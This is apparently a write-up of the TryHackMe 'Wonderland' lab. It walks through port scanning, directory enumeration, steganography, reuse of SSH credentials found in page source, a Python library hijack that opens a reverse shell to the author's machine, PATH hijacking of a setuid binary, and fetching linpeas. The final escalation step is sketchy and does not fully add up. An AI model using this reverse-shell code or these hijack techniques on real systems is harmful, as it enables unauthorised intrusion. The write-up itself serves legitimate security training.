TryHackMe - Wonderland
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/31%OT=22%CT=1%CU=39160%PV=Y%DS=4%DC=I%G=Y%TM=6245C38
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 729.87 seconds
Port 80
Let's run Gobuster
┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.229.155/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.229.155/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/31 11:22:01 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/poem (Status: 301) [Size: 0] [--> poem/]
/r (Status: 301) [Size: 0] [--> r/]
===============================================================
2022/03/31 11:31:29 Finished
===============================================================
On /r we have nothing interesting
On /img there are some images
Let's modify our /etc/hosts and add this
10.10.95.114 wonderland
Now we can use gobuster for subdomain enumeration as well (it does not five anything but it was worth a try)
Let's have a closer look to the images.
First lets take the rabbit one As it is written pretty much everywhere to follow the white rabbit.
┌──(root💀kali)-[~/Documents/tryhackme/wonderland]
└─# steghide --info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
It asks for a passphrase but there is no need to enter anything you can just type enter.
And we can see that a hint is embeded in the image, lets extract it
steghide --extract -sf white_rabbit_1.jpg
sf will specify it is a stego file.Here is the hint
┌──(root💀kali)-[~/Documents/tryhackme/wonderland]
└─# cat hint.txt
follow the r a b b i t
In our gobuster there was an r directory. So this probably means that r a b b i t
is a path that we need to follow
If we look at the code of the last page we get what seems to be user:pass:
alice:HowDothTheLittleCrocodileImproveHisShiningTail
Let's try those on the ssh. It works:
alice@wonderland:~$
If we check the hint for the user.txt it says everything is upside down so I tried to find a file called
txt.resu
but it was not it, then I realized as we have the root.txt in alice's folder maybe the user.txt is in a the root so I tried acat /root/user.txt
And it worked!
Let's try to become root
Privilege Escalation
If we sudo -l using alice password, we get htis
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
If we l0ok at the python script it seems to show 10 of any sentence of the poem randomly
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
Having the right to this specific file means that this the way to privesc.
It seems like we could hijack the python library. I found this really interesintg article that explains it pretty well
So our walrus script uses the library random.py. I modified it like this to get a reverse shell and I launched it as the user rabbit this way:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.13.22.56",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
With a shell as rabbit we can now have a look at their home folder and we can see this file called teaParty. If we use file on it we get this result:
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
If we launch it it ends with a segfault
Probably by Thu, 31 Mar 2022 23:15:41 +0000
Welcome to the tea party!
The Mad Hatter will be here soon.
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
Let's take a look at it from our attacking machine as we do not have a the strings function in the target machine
we can serve it using http server of python as it is installed in the machine
python3.6 -m http.server 8888
When we look at it with strings we see this line:
/bin/echo -n 'Probably by ' && date --date='next hour' -R
So date is invoked without using the full path, we could certainly abuse this by putting a file called date and make it do something for us.
Now we serve it from our attacking machine with python and get it in our target
We have to make it executable with
chmod +x
And we need to export rabbit's home as our path
export PATH=/home/rabbit:$PATH
echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
There are no specific file that caught our attention and sudo -l does not list anything so let's get linepeas and check out what we could do.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
we run this in our attacking machineWe serve it using python server
python3 -m http.server 80
We dowload it in our target
wget http://10.13.22.56/linpeas_linux_amd64
add it execution right with
chmod +x
and run it ./linpeas_linux_amd64We are root and can read our last flag on alice's home!
Last updated